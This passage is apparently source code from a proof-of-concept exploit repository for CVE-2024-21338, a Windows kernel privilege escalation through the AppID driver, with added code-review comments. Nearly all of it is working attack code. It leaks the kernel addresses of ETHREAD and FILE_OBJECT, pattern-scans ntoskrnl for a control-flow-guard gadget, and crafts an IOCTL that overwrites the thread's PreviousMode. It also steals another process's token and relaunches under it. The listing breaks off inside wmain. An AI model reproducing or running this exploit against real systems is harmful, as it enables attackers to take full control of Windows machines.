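    if (userbuffer == NULL) {
        wprintf(L"Failed to allocate the user buffer\n");
    }

    return userbuffer;
}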
27 |
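/*
 * Look up the kernel address of the calling thread's ETHREAD object.
 *
 * The current-thread pseudo-handle (-2) is duplicated into a real handle, the
 * SystemHandleInformation snapshot is queried, and the entry matching this
 * process and that handle yields its Object pointer.
 *
 * Returns the object address, or 0 on any failure. The earlier version
 * returned 1 when DuplicateHandle failed; 1 is not a usable address, and a
 * caller testing for 0 would have accepted it as success.
 *
 * Other fixes: the duplicated handle was never closed on the success path;
 * a failed HeapAlloc/HeapReAlloc was dereferenced on the next loop iteration;
 * a failing query with a NULL buffer fell through to HeapFree(NULL) silently.
 *
 * Caveat from the types in Common.h: SYSTEM_HANDLE_TABLE_ENTRY_INFO holds the
 * PID and handle value in 16-bit fields, so a process id or handle value
 * above 0xFFFF cannot match and the function returns 0.
 */
UINT_PTR GetETHREADAddress()
{
    NTSTATUS status;
    HANDLE hCurrentThreadPseudoHandle = ((HANDLE)(LONG_PTR)-2); // GetCurrentThread() value
    HANDLE hDuplicatedHandle = NULL;
    UINT_PTR objectAddress = 0;
    ULONG ulBytes = 0;
    PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL;

    BOOL success = DuplicateHandle(
        ((HANDLE)(LONG_PTR)-1), // GetCurrentProcess() value
        hCurrentThreadPseudoHandle,
        ((HANDLE)(LONG_PTR)-1),
        &hDuplicatedHandle,
        0,
        FALSE,
        DUPLICATE_SAME_ACCESS);

    if (!success)
    {
        wprintf(L"Failed to duplicate handle. Error: %lu\n", GetLastError());
        return 0;
    }

    // Grow the buffer until the snapshot fits. The table can change between
    // two calls, so 2 * ulBytes leaves headroom over the reported size.
    while ((status = NtQuerySystemInformation(SystemHandleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        PVOID grown = (handleTableInfo != NULL)
            ? HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes)
            : HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
        if (grown == NULL)
        {
            // HeapReAlloc leaves the old block valid on failure; it is released below.
            wprintf(L"[!] Failed to allocate %lu bytes for the handle table\n", 2 * ulBytes);
            goto cleanup;
        }
        handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)grown;
    }

    if (status != STATUS_SUCCESS || handleTableInfo == NULL)
    {
        wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status);
        goto cleanup;
    }

    for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++)
    {
        // Both fields are 16-bit; see the caveat in the header comment.
        if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
            handleTableInfo->Handles[i].HandleValue == (USHORT)(ULONG_PTR)hDuplicatedHandle)
        {
            objectAddress = (UINT_PTR)handleTableInfo->Handles[i].Object;
            break;
        }
    }

cleanup:
    if (handleTableInfo != NULL)
    {
        HeapFree(GetProcessHeap(), 0, handleTableInfo);
    }
    // The duplicate was only needed to appear in the snapshot; the thread
    // object itself stays alive with the thread.
    CloseHandle(hDuplicatedHandle);

    return objectAddress;
}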
91 |
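/*
 * Create (CREATE_ALWAYS, so any existing file is truncated)
 * C:\Users\Public\example.txt and look up the kernel address of the
 * FILE_OBJECT behind the returned handle, using the same
 * SystemHandleInformation walk as GetETHREADAddress.
 *
 * Returns the object address, or 0 on any failure. The earlier version
 * returned 1 when CreateFileW failed (not a usable address) and its error
 * text spoke of duplicating a handle; it also referenced an unused
 * hDuplicatedHandle and, on the failure path, leaked hFile.
 *
 * hFile is intentionally left open when an address is returned: the address
 * is only meaningful while the kernel object is alive, and the caller
 * presumably depends on that -- confirm before adding a CloseHandle on the
 * success path. When 0 is returned the handle is closed here.
 *
 * The 16-bit PID/handle truncation described on GetETHREADAddress applies.
 */
UINT_PTR GetFILE_OBJECT_Address()
{
    NTSTATUS status;
    UINT_PTR objectAddress = 0;
    ULONG ulBytes = 0;
    PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL;

    HANDLE hFile = CreateFileW(L"C:\\Users\\Public\\example.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        wprintf(L"Failed to create file. Error: %lu\n", GetLastError());
        return 0;
    }

    // Allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
    while ((status = NtQuerySystemInformation(SystemHandleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        PVOID grown = (handleTableInfo != NULL)
            ? HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes)
            : HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
        if (grown == NULL)
        {
            wprintf(L"[!] Failed to allocate %lu bytes for the handle table\n", 2 * ulBytes);
            goto cleanup;
        }
        handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)grown;
    }

    if (status != STATUS_SUCCESS || handleTableInfo == NULL)
    {
        wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status);
        goto cleanup;
    }

    for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++)
    {
        if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() &&
            handleTableInfo->Handles[i].HandleValue == (USHORT)(ULONG_PTR)hFile)
        {
            objectAddress = (UINT_PTR)handleTableInfo->Handles[i].Object;
            break;
        }
    }

cleanup:
    if (handleTableInfo != NULL)
    {
        HeapFree(GetProcessHeap(), 0, handleTableInfo);
    }
    if (objectAddress == 0)
    {
        // Nothing usable is being returned, so the file handle is not needed.
        CloseHandle(hFile);
    }

    return objectAddress;
}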
147 |
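/*
 * Return the kernel image base of the first loaded module whose recorded name
 * contains TargetModule.
 *
 * TargetModule: substring matched with strstr against SYSTEM_MODULE.Name, so
 *               a short string such as "nt" matches more than one module;
 *               pass the full file name.
 *
 * Returns the ImageBaseAddress of the first match, or 0 if TargetModule is
 * NULL, the query fails, or nothing matches. SystemModuleInformation may be
 * refused to low-integrity callers on recent Windows; that surfaces as 0 here.
 *
 * Fixes relative to the earlier version: the module list was never freed on
 * the found path; a failed HeapAlloc/HeapReAlloc was dereferenced on the next
 * iteration; Name is forced to be NUL-terminated before strstr reads it.
 */
UINT_PTR GetKernelModuleAddress(const char* TargetModule)
{
    NTSTATUS status;
    ULONG ulBytes = 0;
    UINT_PTR imageBase = 0;
    PSYSTEM_MODULE_INFORMATION moduleInfo = NULL;

    if (TargetModule == NULL)
    {
        return 0;
    }

    while ((status = NtQuerySystemInformation(SystemModuleInformation, moduleInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        PVOID grown = (moduleInfo != NULL)
            ? HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, moduleInfo, 2 * ulBytes)
            : HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
        if (grown == NULL)
        {
            wprintf(L"[!] Failed to allocate %lu bytes for the module list\n", 2 * ulBytes);
            goto cleanup;
        }
        moduleInfo = (PSYSTEM_MODULE_INFORMATION)grown;
    }

    if (status != STATUS_SUCCESS || moduleInfo == NULL)
    {
        wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status);
        goto cleanup;
    }

    for (ULONG i = 0; i < moduleInfo->ModulesCount; i++)
    {
        // Name is a fixed CHAR[255] copied from the kernel; terminate it
        // ourselves so strstr cannot run past the end of the entry.
        moduleInfo->Modules[i].Name[sizeof(moduleInfo->Modules[i].Name) - 1] = '\0';
        if (strstr(moduleInfo->Modules[i].Name, TargetModule) != NULL)
        {
            imageBase = (UINT_PTR)moduleInfo->Modules[i].ImageBaseAddress;
            break;
        }
    }

cleanup:
    if (moduleInfo != NULL)
    {
        HeapFree(GetProcessHeap(), 0, moduleInfo);
    }

    return imageBase;
}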
192 |
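/*
 * Send IOCTL_AipSmartHashImageFile to the open device with a caller-supplied
 * input buffer and no output buffer.
 *
 * hDevice:        handle returned by NtCreateFile on the device.
 * inputbuffer:    passed through as InputBuffer; its contents are the caller's.
 * inputbufferLen: length of inputbuffer in bytes. NtDeviceIoControlFile takes
 *                 a ULONG, so the narrowing is made explicit and a length that
 *                 does not fit is rejected instead of silently truncated.
 *
 * Returns 1 when the call completes with STATUS_SUCCESS, 0 otherwise (the
 * failing status is printed). The earlier version compared against the Win32
 * NOERROR constant (also 0) and passed a ULONG variable named like a byte
 * count as OutputBufferLength; it was always 0, so the literal is used now.
 */
int SendRequest(HANDLE hDevice, PVOID inputbuffer, size_t inputbufferLen)
{
    IO_STATUS_BLOCK ioStatus = { 0 };
    NTSTATUS status;

    if (inputbufferLen > (size_t)(ULONG)-1)
    {
        wprintf(L"[!] Input buffer length %zu does not fit in a ULONG\n", inputbufferLen);
        return 0;
    }

    status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus, IOCTL_AipSmartHashImageFile, inputbuffer, (ULONG)inputbufferLen, NULL, 0);

    if (status == STATUS_SUCCESS)
    {
        return 1;
    }

    wprintf(L"[!] NtDeviceIoControlFile failed with 0x%X\n", status);
    return 0;
}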
211 |
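/*
 * Search one memory range of hProcess for the first occurrence of a byte pattern.
 *
 * hProcess:       process whose memory is read (exploit.c passes GetCurrentProcess()).
 * lpBaseAddress:  start of the range; dwSize its length in bytes.
 * pattern:        patternSize bytes to look for; compared exactly (no wildcards).
 * lpFoundAddress: on success receives lpBaseAddress + offset of the match.
 *
 * Returns TRUE when a match is found, FALSE otherwise (including when the
 * arguments are unusable, the copy cannot be allocated, or ReadProcessMemory
 * fails).
 *
 * Fixes relative to the earlier version:
 *  - the malloc result is checked;
 *  - patternSize == 0 or patternSize > dwSize is rejected; before, the loop
 *    bound `dwSize - patternSize` underflowed for a short range and the scan
 *    read far past the buffer;
 *  - the loop now covers a match that ends exactly at the end of the range
 *    (`<` excluded the last valid start index);
 *  - only the bytes ReadProcessMemory actually delivered are scanned.
 */
BOOL ScanSectionForPattern(HANDLE hProcess, LPVOID lpBaseAddress, SIZE_T dwSize, BYTE* pattern, SIZE_T patternSize, LPVOID* lpFoundAddress) {
    if (pattern == NULL || lpFoundAddress == NULL || patternSize == 0 || patternSize > dwSize) {
        return FALSE;
    }

    BYTE* buffer = (BYTE*)malloc(dwSize);
    if (buffer == NULL) {
        return FALSE;
    }

    SIZE_T bytesRead = 0;
    BOOL found = FALSE;

    if (ReadProcessMemory(hProcess, lpBaseAddress, buffer, dwSize, &bytesRead) && bytesRead >= patternSize) {
        // Last start index that still leaves patternSize bytes in the buffer.
        SIZE_T lastStart = bytesRead - patternSize;
        for (SIZE_T i = 0; i <= lastStart; i++) {
            if (memcmp(buffer + i, pattern, patternSize) == 0) {
                *lpFoundAddress = (LPVOID)((DWORD_PTR)lpBaseAddress + i);
                found = TRUE;
                break;
            }
        }
    }

    free(buffer);
    return found;
}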
239 |
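/*
 * Locate the ExpProfileDelete byte pattern in the "PAGE" section of a module
 * mapped into this process and return its offset from the module base.
 *
 * hModule: base of an image mapped in the current process; the PE headers are
 *          read in-process and the section is scanned through
 *          ScanSectionForPattern(GetCurrentProcess(), ...), so a kernel
 *          address is not acceptable here.
 *
 * Returns the RVA of the match, or 0 if hModule is NULL, the headers do not
 * carry the MZ/PE signatures, there is no PAGE section, or the pattern is
 * absent. Only the first section named exactly "PAGE" is scanned.
 *
 * Fixes relative to the earlier version: e_lfanew and the section count were
 * trusted without checking the DOS and NT signatures; the section name was
 * compared with strcmp although IMAGE_SECTION_HEADER.Name is an 8-byte field
 * that is not NUL-terminated when all 8 bytes are used.
 */
UINT_PTR FindPattern(HMODULE hModule)
{
    UINT_PTR relativeOffset = 0;

    if (hModule == NULL) {
        return 0;
    }

    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        printf("\t[!] Module does not start with an MZ header.\n");
        return 0;
    }

    PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)hModule + pDosHeader->e_lfanew);
    if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
        printf("\t[!] Module does not carry a PE signature.\n");
        return 0;
    }

    PIMAGE_SECTION_HEADER pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
    LPVOID lpFoundAddress = NULL;

    // Pattern of bytes for nt!ExpProfileDelete
    // Learned hard way that CFG is such sensitive to even missing a single byte
    BYTE pattern[] = {0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x83, 0x79, 0x30, 0x00, 0x48, 0x8B, 0xD9, 0x74};
    SIZE_T patternSize = sizeof(pattern);

    for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++) {
        // Bounded compare: Name is IMAGE_SIZEOF_SHORT_NAME bytes, zero-padded
        // only when shorter than that.
        if (strncmp((const char*)pSectionHeader[i].Name, "PAGE", IMAGE_SIZEOF_SHORT_NAME) != 0) {
            continue;
        }

        LPVOID lpSectionBaseAddress = (LPVOID)((LPBYTE)hModule + pSectionHeader[i].VirtualAddress);
        SIZE_T dwSectionSize = pSectionHeader[i].Misc.VirtualSize;

        if (ScanSectionForPattern(GetCurrentProcess(), lpSectionBaseAddress, dwSectionSize, pattern, patternSize, &lpFoundAddress)) {
            printf("\t[*] ExpProfileDelete function found in the PAGE section of ntoskrnl.exe.\n");
            printf("\t[*] Starting address of ExpProfileDelete: 0x%p\n", lpFoundAddress);

            // Calculate the relative offset
            relativeOffset = (UINT_PTR)lpFoundAddress - (UINT_PTR)hModule;
            printf("\t[*] Relative offset of ExpProfileDelete: 0x%p\n", (LPVOID)relativeOffset);
        }
        else {
            printf("\t[!] ExpProfileDelete function not found in the PAGE section of ntoskrnl.exe.\n");
        }

        break; // only the first PAGE section is considered
    }

    return relativeOffset;
}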
278 |
/*
 * PoC body, called from wmain() once the process is known to run as
 * LOCAL SERVICE. Returns 0 on success and -1 on any failure.
 *
 * NOTE(review): resource handling is best-effort. userBuffer (from
 * CheckWindowsVersionAndSetOffsets), the 1-byte scratch buffer and hDevice
 * are released only on the success path; every early `return -1` leaks
 * whatever was acquired before it.
 */
int exploit()
{
    size_t offsetOfPreviousMode = 0;
    size_t bufferLength = 0;
    OSVERSIONINFOEXW osInfo = { 0 };
    CFG_FUNCTION_WRAPPER cfgFunction = { 0 };
    // Presumably selects the buffer layout and offsets for the running build;
    // the definition is outside this listing. Returns NULL on failure.
    void* userBuffer = CheckWindowsVersionAndSetOffsets(&offsetOfPreviousMode, &osInfo);

    if (!userBuffer) {
        wprintf(L"Failed to allocate or determine the correct user buffer.\n");
        return -1; // Error handling
    }

    // NOTE(review): NULL (a pointer constant) used to initialise an integer; 0 is meant.
    ULONG_PTR PrevMode = NULL;
    NTSTATUS status;
    DWORD dwBytesReturned = 0;
    HANDLE hDevice, eventHandle = NULL; // eventHandle is never used
    UNICODE_STRING deviceName;
    OBJECT_ATTRIBUTES objAttr;
    IO_STATUS_BLOCK ioStatus;
    RtlInitUnicodeString(&deviceName, L"\\Device\\AppID");
    InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL, NULL);
    wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer);
    status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE,
        &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0);

    if (status != 0)
    {
        wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status);
        return -1; // NOTE(review): leaks userBuffer
    }

    wprintf(L"[+] Opened a handle successfully %p\n", hDevice);
    wprintf(L"[*] Leaking the current ETHREAD address\n");
    UINT_PTR ETHREADAddress = GetETHREADAddress();
    UINT_PTR FILE_OBJECT_Address = GetFILE_OBJECT_Address();
    UINT_PTR ntoskrnlKernelBase = GetKernelModuleAddress("ntoskrnl.exe");
    HMODULE ntoskrnlUserBase = LoadLibraryExW(L"C:\\Windows\\System32\\ntoskrnl.exe", NULL, 0);

    // NOTE(review): with && this branch fires only when all four lookups failed;
    // a single NULL (e.g. a failed LoadLibraryExW) still reaches FindPattern below.
    // || was probably intended.
    if (!ETHREADAddress && !ntoskrnlKernelBase && !ntoskrnlUserBase && !FILE_OBJECT_Address)
    {
        wprintf(L"[!] Failed to leak the ETHREAD/KernelBase address\n");
        return -1; // NOTE(review): leaks userBuffer and hDevice
    }

    // NOTE(review): %p with integer (UINT_PTR) arguments throughout; a (void*) cast
    // would make these conforming.
    wprintf(L"[+] Leaked ETHREAD address: 0x%p\n", ETHREADAddress);

    PrevMode = ETHREADAddress + offsetOfPreviousMode;

    UINT_PTR reloffset = FindPattern(ntoskrnlUserBase);

    // NOTE(review): FindPattern returns 0 when the pattern is not found; that case is
    // not checked here.
    UINT_PTR CFG_GADGET = ntoskrnlKernelBase + reloffset;

    wprintf(L"[+] Our Thread PreviousMode Kernel Address => %p\n", PrevMode);
    wprintf(L"[+] FILE_OBJECT Address => %p\n", FILE_OBJECT_Address);
    wprintf(L"[+] CFG Gadget Kernel Base Address => %p\n", ntoskrnlKernelBase);
    wprintf(L"[+] CFG Gadget User Base Address => %p\n", ntoskrnlUserBase);
    wprintf(L"[+] CFG Gadget Address => %p\n", CFG_GADGET);


    // Build 22000 is the first Windows 11 release build; it is treated here as the
    // split between the two buffer layouts (assumed — confirm against the layouts' headers).
    if (osInfo.dwBuildNumber < 22000) {
        USER_BUFFER_W10* bufferW10 = (USER_BUFFER_W10*)userBuffer;

        cfgFunction.FunctionPointer = CFG_GADGET;
        // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in ObfDereferenceObjectWithTag
        UINT_PTR prevModeObf = PrevMode + 0x30;

        bufferW10->FirstArg = prevModeObf; // +0x00
        bufferW10->Value = FILE_OBJECT_Address; // +0x08
        bufferW10->PtrToFunctionWrapper = (UINT_PTR)&cfgFunction; // +0x10

        bufferLength = sizeof(USER_BUFFER_W10);
    }
    else
    {
        USER_BUFFER_W11* bufferW11 = (USER_BUFFER_W11*)userBuffer;

        cfgFunction.FunctionPointer = CFG_GADGET;
        // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in ObfDereferenceObjectWithTag
        UINT_PTR prevModeObf = PrevMode + 0x30;

        bufferW11->FirstArg = prevModeObf; // +0x00
        bufferW11->Value = FILE_OBJECT_Address; // +0x08
        bufferW11->PtrToFunctionWrapper = (UINT_PTR)&cfgFunction; // +0x10
        bufferW11->Unknown = NULL; // +0x18

        bufferLength = sizeof(USER_BUFFER_W11);
    }

    wprintf(L"[*] Sending the request to trigger the bug\n");
    // One-byte scratch buffer. NOTE(review): allocation result is not checked.
    char* buffer = (char*)malloc(sizeof(CHAR));
    if (userBuffer) // always true: userBuffer was checked above
    {
        if (SendRequest(hDevice, userBuffer, bufferLength))
        {
            wprintf(L"[+] Sent the request successfully\n");
        }
        else
        {
            wprintf(L"[!] Failed to send the request\n");
            return -1; // NOTE(review): leaks buffer, userBuffer and hDevice
        }
        wprintf(L"[+] Request Successful!\n");
        wprintf(L"[+] Checking PreviousMode...\n");
        // NOTE(review): return value (NTSTATUS) is ignored; *buffer is printed regardless.
        NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)buffer, (PVOID)PrevMode, sizeof(CHAR), &dwBytesReturned);
        wprintf(L"[*] PreviousMode => %d\n", *buffer);
    }

    wprintf(L"[+] Exploit Done!\n");
    wprintf(L"[+] Starting cleanup...\n");
    Sleep(2000);
    *buffer = 1;
    // NOTE(review): return value is ignored here too, so "Cleanup Done" is printed
    // even if the write failed.
    NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)PrevMode, (PVOID)buffer, sizeof(CHAR), &dwBytesReturned);
    wprintf(L"[+] Cleanup Done!.\n[+] Press Enter To End!\n");
    getchar();

    free(userBuffer);
    free(buffer);
    NtClose(hDevice);

    return 0;
}
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/main.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include "Common.h"
6 |
/* ntdll exports resolved at runtime by init_ntdll(). Every other function in
 * this file calls through these pointers unconditionally, so init_ntdll() must
 * have succeeded first. The pNt… / pRtl… typedefs come from Common.h. */
pNtAdjustPrivilegesToken NtAdjustPrivilegesToken = NULL;
pNtOpenProcessToken NtOpenProcessToken = NULL;
pNtOpenProcess NtOpenProcess = NULL;
pNtWriteVirtualMemory NtWriteVirtualMemory = NULL;
pNtDuplicateToken NtDuplicateToken = NULL;
pNtSetInformationThread NtSetInformationThread = NULL;
pNtQueryInformationToken NtQueryInformationToken = NULL;
pNtClose NtClose = NULL;
pNtDeviceIoControlFile NtDeviceIoControlFile = NULL;
pNtCreateFile NtCreateFile = NULL;
pNtQuerySystemInformation NtQuerySystemInformation = NULL;
pRtlInitUnicodeString RtlInitUnicodeString = NULL;
pRtlGetVersion RtlGetVersion = NULL;

/* Pseudo-handles for the current process (-1) and current thread (-2); these
 * are the values the NtCurrentProcess()/NtCurrentThread() macros expand to. */
HANDLE currentProcessHandle = ((HANDLE)(LONG_PTR)-1);
HANDLE currentThreadHandle = ((HANDLE)(LONG_PTR)-2);

/* Defined below wmain(). Duplicates the token of process dwPid and returns the
 * handle through duplicateTokenHandleOut (NULL on failure). */
void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid);
25 |
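/*
 * Resolve the ntdll exports this program uses into the file-scope function
 * pointers declared above.
 *
 * Returns 1 on success and 0 when ntdll cannot be located or any export is
 * missing. Each pointer is called unconditionally elsewhere in the program, so
 * a partial resolution must not be reported as success; the previous `&&`
 * chain only failed when every lookup returned NULL, which let a single
 * missing export surface later as a call through a NULL pointer.
 */
int init_ntdll()
{
    HMODULE hNtdll = GetModuleHandleW(L"ntdll");
    if (hNtdll == NULL)
    {
        /* GetLastError() returns a DWORD, so %lu is the matching conversion. */
        wprintf(L"[!] Failed to load ntdll.dll! (Error code: %lu)\n", GetLastError());
        return 0;
    }

    RtlGetVersion = (pRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion");
    NtAdjustPrivilegesToken = (pNtAdjustPrivilegesToken)GetProcAddress(hNtdll, "NtAdjustPrivilegesToken");
    NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NtOpenProcessToken = (pNtOpenProcessToken)GetProcAddress(hNtdll, "NtOpenProcessToken");
    NtOpenProcess = (pNtOpenProcess)GetProcAddress(hNtdll, "NtOpenProcess");
    NtDuplicateToken = (pNtDuplicateToken)GetProcAddress(hNtdll, "NtDuplicateToken");
    NtSetInformationThread = (pNtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread");
    NtQueryInformationToken = (pNtQueryInformationToken)GetProcAddress(hNtdll, "NtQueryInformationToken");
    NtClose = (pNtClose)GetProcAddress(hNtdll, "NtClose");

    NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
    NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile");
    NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile");

    /* Any single unresolved export is a hard failure. */
    if (!NtAdjustPrivilegesToken || !NtOpenProcess || !NtDuplicateToken || !NtOpenProcessToken
        || !NtSetInformationThread || !NtQueryInformationToken || !NtClose
        || !NtQuerySystemInformation || !RtlInitUnicodeString || !NtCreateFile
        || !NtDeviceIoControlFile || !RtlGetVersion || !NtWriteVirtualMemory)
    {
        wprintf(L"[!] Failed to resolve ntdll functions\n");
        return 0;
    }

    return 1;
}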
60 |
/*
 * Re-launch this executable under duplicatedTokenHandle with
 * CreateProcessAsUserW and wait for it to exit. When dwPid is non-zero the
 * child is started with the arguments "<dwPid> 0" (so wmain() in the child
 * sees argc == 3); otherwise it is started with no arguments.
 *
 * NOTE(review): the function is declared void but executes `return -1;` on
 * three error paths. That is a constraint violation (C compilers at least
 * warn); those should be bare `return;`. GetModuleFileNameW is also given a
 * size of 100 although selfPath holds MAX_PATH characters, so paths longer
 * than 99 characters are truncated and the launch fails.
 */
void spawnShell(HANDLE duplicatedTokenHandle, int64_t dwPid)
{
    WCHAR selfPath[MAX_PATH] = { 0 };
    if (!GetModuleFileNameW(NULL, selfPath, 100)) { // NOTE(review): 100 != MAX_PATH
        wprintf(L"Failed to get module file name.\n");
        return -1; // NOTE(review): value returned from a void function
    }
    WCHAR cmdLine[MAX_PATH] = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFO si = { 0 };

    if (dwPid != 0)
    {
        // Child command line: "<selfPath> <dwPid> 0"
        if (swprintf_s(cmdLine, MAX_PATH, L"%s %lld 0", selfPath, dwPid) == -1) {
            wprintf(L"ERROR: Failed to format command line.\n");
            return -1; // NOTE(review): value returned from a void function
        }
    }
    else
    {
        if (wcscpy_s(cmdLine, MAX_PATH, selfPath) != 0) {
            wprintf(L"ERROR: Failed to copy selfPath to cmdLine.\n");
            return -1; // NOTE(review): value returned from a void function
        }
    }

    // Set up STARTUPINFO
    si.cb = sizeof(si);
    si.lpDesktop = L"Winsta0\\Default";
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;

    // This will fail with ACCESS_DENIED if the local service doesn't have the permissions to access the directory
    BOOL bResult = CreateProcessAsUserW(
        duplicatedTokenHandle,
        NULL,
        cmdLine,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pi
    );

    if (!bResult) {
        wprintf(L"CreateProcessAsUserW failed with error %ld\n", GetLastError());
    }
    else {
        wprintf(L"Process created successfully.\n");
        // Block until the child exits, then release both handles.
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}
118 |
/*
 * Report whether the current process token belongs to
 * NT AUTHORITY\LOCAL SERVICE (SID S-1-5-19). Despite the function name, the
 * SYSTEM account (S-1-5-18) is not what is tested.
 *
 * Returns TRUE only for LOCAL SERVICE. Any failure on the way (token open,
 * size query, allocation, SID conversion) is logged and yields FALSE.
 */
BOOL IsRunningAsSystem() {
    BOOL isLocalService = FALSE;
    HANDLE hToken = NULL;
    PTOKEN_USER tokenUser = NULL;
    LPWSTR sidText = NULL;
    ULONG neededSize = 0;
    NTSTATUS st;

    st = NtOpenProcessToken(currentProcessHandle, TOKEN_QUERY, &hToken);
    if (st != 0) {
        wprintf(L"NtOpenProcessToken failed. Status: 0x%x\n", st);
        return FALSE;
    }

    /* The first query is expected to fail with STATUS_BUFFER_TOO_SMALL
     * (0xC0000023) and report the size of the TOKEN_USER blob. */
    st = NtQueryInformationToken(hToken, TokenUser, NULL, 0, &neededSize);
    if (st != 0xC0000023) {
        wprintf(L"NtQueryInformationToken (1) failed. Status: 0x%x\n", st);
        goto cleanup;
    }

    tokenUser = (PTOKEN_USER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, neededSize);
    if (tokenUser == NULL) {
        wprintf(L"HeapAlloc failed.\n");
        goto cleanup;
    }

    st = NtQueryInformationToken(hToken, TokenUser, tokenUser, neededSize, &neededSize);
    if (st != 0) {
        wprintf(L"NtQueryInformationToken (2) failed. Status: 0x%x\n", st);
        goto cleanup;
    }

    if (!ConvertSidToStringSidW(tokenUser->User.Sid, &sidText)) {
        wprintf(L"ConvertSidToStringSidW failed.\n");
        goto cleanup;
    }

    // NT AUTHORITY\LOCAL SERVICE
    isLocalService = (_wcsicmp(sidText, L"S-1-5-19") == 0);

cleanup:
    /* Release in the same order as the original early-return paths; each
     * resource is freed only if it was actually acquired. */
    if (sidText != NULL) {
        LocalFree(sidText);
    }
    if (tokenUser != NULL) {
        HeapFree(GetProcessHeap(), 0, tokenUser);
    }
    NtClose(hToken);

    return isLocalService;
}
173 |
/*
 * Program entry point.
 *  - Running as LOCAL SERVICE: run exploit() and exit the process.
 *  - Otherwise: expect two numeric arguments (the PID whose token is
 *    duplicated, and the PID forwarded to spawnShell), duplicate the first
 *    process's token and re-launch this binary under it.
 *
 * Returns -1 on init or usage failure, -2 when the PIDs are non-numeric and
 * -3 when token duplication failed.
 *
 * NOTE(review): the usage string below looks truncated in this listing; the
 * argument placeholders were probably lost in rendering — confirm against the
 * original source. _wtoi() returns 0 for non-numeric input, and the check
 * `!dwPid && !dwPid2` rejects only the case where both are 0; a zero second
 * PID is a legitimate value for spawnShell, so this may be intentional.
 */
int wmain(int argc, wchar_t* argv[])
{
    if (!init_ntdll())
    {
        return -1;
    }

    if (IsRunningAsSystem()) { // despite its name, tests for LOCAL SERVICE (S-1-5-19)
        wprintf(L"The process is running as NT AUTHORITY\\LOCAL SERVICE.\n");
        exploit();
        ExitProcess(0);
    }
    else {
        wprintf(L"The process is not running as NT AUTHORITY\\LOCAL SERVICE.\n");

        if (3 != argc)
        {
            wprintf(L"Usage: %ls ", argv[0]);
            return -1;
        }

        HANDLE duplicatedTokenHandle = NULL;
        int64_t dwPid = 0;
        int64_t dwPid2 = 0;
        dwPid = _wtoi(argv[1]);
        dwPid2 = _wtoi(argv[2]);
        if (!dwPid && !dwPid2)
        {
            wprintf(L"PIDs must be numeric.\r\n");
